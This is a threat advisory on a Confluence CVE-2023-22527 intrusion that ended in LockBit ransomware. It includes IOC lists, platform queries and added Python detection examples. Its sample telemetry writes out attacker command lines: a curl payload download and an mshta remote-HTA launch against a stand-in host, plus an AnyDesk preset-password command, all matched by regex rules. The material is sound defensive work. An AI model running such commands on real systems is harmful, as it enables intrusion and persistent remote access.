Confluence Exploit Leads to LockBit Ransomware

    Date: 02/28/2025

    Severity: Critical

    Summary

    The intrusion began with the exploitation of CVE-2023-22527, a critical remote code execution (RCE) vulnerability in Confluence, on a Windows server. The first post-exploitation activity was host discovery with commands such as net user and whoami. The attacker then tried to download AnyDesk with curl; that attempt failed, so they instead used mshta to run a remote HTA file containing a Metasploit stager. Once command and control was established through that stager, they retrieved and installed AnyDesk with a preset password, giving them persistent remote access to the host. The intrusion culminated in the deployment of LockBit ransomware.
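    The chain described above (web server process spawning a shell, a burst of discovery commands, curl writing a download to disk, mshta launched with a remote URL, AnyDesk given a preset password) can be detected from process-creation telemetry. The Python below is an added example, not code from Gurucul or The DFIR Report. It assumes Confluence on Windows runs inside Tomcat (so the exploit's shell appears as a child of tomcat9.exe or java.exe) and that the preset AnyDesk password is applied with AnyDesk's --set-password flag; the sample events are constructed Sysmon-style process-creation records, and 198.51.100.7 is a documentation address, not an IOC from this case.

```python
import re
from collections import defaultdict

# Assumption: on Windows, Confluence runs inside Tomcat, so a shell spawned
# by the exploit shows up as a child of the Tomcat/Java service process.
CONFLUENCE_PARENTS = {"tomcat9.exe", "tomcat8.exe", "java.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# Discovery tools named in the summary plus common companions.
DISCOVERY_TOOLS = {"whoami.exe", "net.exe", "net1.exe", "ipconfig.exe",
                   "systeminfo.exe", "nltest.exe"}

# Command-line rules for the rest of the chain.
COMMAND_RULES = {
    # mshta launched with a remote URL (remote HTA delivering a stager)
    "mshta_remote_hta": re.compile(r"\bmshta(\.exe)?\b.*https?://", re.I),
    # curl writing a download to disk via -o / -O / --output
    "curl_download_to_disk": re.compile(r"\bcurl(\.exe)?\b.*\s(-o|-O|--output)\s", re.I),
    # AnyDesk being given an unattended-access password
    # (assumption: the preset password is applied with AnyDesk's --set-password flag)
    "anydesk_preset_password": re.compile(r"anydesk.*--set-password", re.I),
}


def basename(path):
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyse(events):
    """Run all rules over process-creation events.

    Returns a list of (rule_name, host, detail) tuples. Single-event rules
    fire immediately; 'discovery_burst' fires once per host that ran two or
    more distinct discovery tools.
    """
    findings = []
    discovery_tools_by_host = defaultdict(set)
    for ev in events:
        image = basename(ev["image"])
        parent = basename(ev["parent_image"])
        cmd = ev["command_line"]
        if parent in CONFLUENCE_PARENTS and image in SHELLS:
            findings.append(("confluence_spawned_shell", ev["host"], cmd))
        if image in DISCOVERY_TOOLS:
            discovery_tools_by_host[ev["host"]].add(image)
        for name, pattern in COMMAND_RULES.items():
            if pattern.search(cmd):
                findings.append((name, ev["host"], cmd))
    for host, tools in sorted(discovery_tools_by_host.items()):
        if len(tools) >= 2:
            findings.append(("discovery_burst", host, ", ".join(sorted(tools))))
    return findings


# Constructed sample telemetry (not real logs from the case).
SAMPLE_EVENTS = [
    {"host": "CONF01", "parent_image": r"C:\Atlassian\Confluence\bin\tomcat9.exe",
     "image": r"C:\Windows\System32\cmd.exe", "command_line": "cmd.exe /c whoami"},
    {"host": "CONF01", "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\whoami.exe", "command_line": "whoami"},
    {"host": "CONF01", "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\net.exe", "command_line": "net user"},
    {"host": "CONF01", "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\curl.exe",
     "command_line": r"curl http://198.51.100.7/AnyDesk.exe -o C:\Users\Public\AnyDesk.exe"},
    {"host": "CONF01", "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "command_line": "mshta http://198.51.100.7/a.hta"},
    {"host": "CONF01", "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": r'cmd.exe /c echo Passw0rd | "C:\Program Files (x86)\AnyDesk\AnyDesk.exe" --set-password'},
    # Benign activity on another host, should produce no findings.
    {"host": "WS07", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Mozilla Firefox\firefox.exe", "command_line": "firefox.exe"},
]

if __name__ == "__main__":
    for rule, host, detail in analyse(SAMPLE_EVENTS):
        print(f"{host}: {rule}: {detail}")
```

    Each rule on its own is noisy in a large estate (administrators do run curl and net user); the value is in the combination on one host within a short window, which is why the discovery rule aggregates per host rather than alerting on a single command.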

    Indicators of Compromise (IOC) List

    IP Address : 

    92.51.2.22

    92.51.2.27

    Hash (MD5, SHA1 and SHA256 digests; the algorithm is identified by digest length) :

    MD5    438448FDC7521ED034F6DABDF814B6BA
    SHA1   F08E7343A94897ADEAE78138CC3F9142ED160A03
    SHA256 1E2E25A996F72089F12755F931E7FCA9B64DD85B03A56A9871FD6BB8F2CF1DBB

    MD5    D7ADDB5B6F55EAB1686410A17B3C867B
    SHA1   A54AF16B2702FE0E5C569F6D8F17574A9FDAF197
    SHA256 498BA0AFA5D3B390F852AF66BD6E763945BF9B6BFF2087015ED8612A18372155

    MD5    9D495530A421A7C7E113B7AFC3A50504
    SHA1   02D291E2FF5799A13EACC72AD0758F2C5E69D414
    SHA256 594F2F8AB05F88F765D05EB1CF24E4C697746905A61ED04A6FC2B744DD6FEBB0

    MD5    3BD63B2962D41D2E29E570238D28EC0E
    SHA1   9537E1C4E5DDD7FB9B98C532CA89A9DB08262AB4
    SHA256 7AA8E510B9C3B5D39F84E4C2FA68C81DA888E091436FDB7FEE276EE7FF87F016

    Gurucul Threat Detection and Incident Response (TDIR) Queries for Detection

    IP Address :

    dstipaddress IN ("92.51.2.22","92.51.2.27") or ipaddress IN ("92.51.2.22","92.51.2.27") or publicipaddress IN ("92.51.2.22","92.51.2.27") or srcipaddress IN ("92.51.2.22","92.51.2.27")

    SHA1 Hash :

    sha1hash IN ("A54AF16B2702FE0E5C569F6D8F17574A9FDAF197","F08E7343A94897ADEAE78138CC3F9142ED160A03","02D291E2FF5799A13EACC72AD0758F2C5E69D414","9537E1C4E5DDD7FB9B98C532CA89A9DB08262AB4")

    MD5 Hash :

    md5hash IN ("438448FDC7521ED034F6DABDF814B6BA","D7ADDB5B6F55EAB1686410A17B3C867B","9D495530A421A7C7E113B7AFC3A50504","3BD63B2962D41D2E29E570238D28EC0E")

    SHA256 Hash :

    sha256hash IN ("498BA0AFA5D3B390F852AF66BD6E763945BF9B6BFF2087015ED8612A18372155","1E2E25A996F72089F12755F931E7FCA9B64DD85B03A56A9871FD6BB8F2CF1DBB","594F2F8AB05F88F765D05EB1CF24E4C697746905A61ED04A6FC2B744DD6FEBB0","7AA8E510B9C3B5D39F84E4C2FA68C81DA888E091436FDB7FEE276EE7FF87F016")
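    The same IOC matching can be reproduced outside the Gurucul platform. The Python below is an added example (not Gurucul's or The DFIR Report's code) that applies the IP-field and hash matching of the queries above to Sysmon-style events: it parses the Sysmon Hashes field (MD5=...,SHA256=...,IMPHASH=...), normalizes case, and checks each digest against the IOC set for its own algorithm, so a lowercase digest in a log still matches the upper-case IOC list. The field names mirror the queries; the events are constructed and the file name in them is a placeholder.

```python
import re

# IOC values from the list above (hashes normalized to upper case).
IOC_IPS = {"92.51.2.22", "92.51.2.27"}
IOC_BY_ALGO = {
    "MD5": {"438448FDC7521ED034F6DABDF814B6BA", "D7ADDB5B6F55EAB1686410A17B3C867B",
            "9D495530A421A7C7E113B7AFC3A50504", "3BD63B2962D41D2E29E570238D28EC0E"},
    "SHA1": {"F08E7343A94897ADEAE78138CC3F9142ED160A03", "A54AF16B2702FE0E5C569F6D8F17574A9FDAF197",
             "02D291E2FF5799A13EACC72AD0758F2C5E69D414", "9537E1C4E5DDD7FB9B98C532CA89A9DB08262AB4"},
    "SHA256": {"1E2E25A996F72089F12755F931E7FCA9B64DD85B03A56A9871FD6BB8F2CF1DBB",
               "498BA0AFA5D3B390F852AF66BD6E763945BF9B6BFF2087015ED8612A18372155",
               "594F2F8AB05F88F765D05EB1CF24E4C697746905A61ED04A6FC2B744DD6FEBB0",
               "7AA8E510B9C3B5D39F84E4C2FA68C81DA888E091436FDB7FEE276EE7FF87F016"},
}
# Same four address fields the Gurucul IP query checks.
IP_FIELDS = ("dstipaddress", "ipaddress", "publicipaddress", "srcipaddress")
HEX = re.compile(r"[0-9A-F]+")


def parse_sysmon_hashes(field):
    """Parse a Sysmon 'Hashes' string such as 'MD5=ab..,SHA256=cd..,IMPHASH=..'.

    Returns {algorithm: UPPERCASE_DIGEST} for the algorithms we hold IOCs for;
    IMPHASH and malformed entries are dropped.
    """
    digests = {}
    for part in field.split(","):
        algo, _, value = part.partition("=")
        algo, value = algo.strip().upper(), value.strip().upper()
        if algo in IOC_BY_ALGO and HEX.fullmatch(value):
            digests[algo] = value
    return digests


def match_event(event):
    """Return every IOC hit in one event as (kind, field_or_algo, value)."""
    hits = []
    for field in IP_FIELDS:
        if event.get(field) in IOC_IPS:
            hits.append(("ip", field, event[field]))
    for algo, digest in parse_sysmon_hashes(event.get("hashes", "")).items():
        if digest in IOC_BY_ALGO[algo]:
            hits.append(("hash", algo, digest))
    return hits


def scan(events):
    """Return [(event_index, hits)] for events with at least one IOC hit."""
    results = []
    for index, event in enumerate(events):
        hits = match_event(event)
        if hits:
            results.append((index, hits))
    return results


# Constructed sample events (not real telemetry from the case).
SAMPLE_EVENTS = [
    {"event": "process_create", "image": r"C:\Users\Public\sample.exe",
     "hashes": "MD5=00000000000000000000000000000000,"
               "SHA256=1e2e25a996f72089f12755f931e7fca9b64dd85b03a56a9871fd6bb8f2cf1dbb,"
               "IMPHASH=00000000000000000000000000000000"},
    {"event": "network_flow", "srcipaddress": "10.0.0.5", "dstipaddress": "92.51.2.27"},
    {"event": "network_flow", "srcipaddress": "10.0.0.5", "dstipaddress": "8.8.8.8"},
]

if __name__ == "__main__":
    for index, hits in scan(SAMPLE_EVENTS):
        print(f"event {index}: {hits}")
```

    Matching per algorithm, rather than against one merged set, avoids a 32-character MD5 being silently compared with a SHA1 list, which is the mistake the separate md5hash / sha1hash / sha256hash queries above are also structured to prevent.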

    Reference:

    https://thedfirreport.com/2025/02/24/confluence-exploit-leads-to-lockbit-ransomware/#indicators


    Tags

    Malware, Exploit, Ransomware, Metasploit, Lockbit, CVE-2023

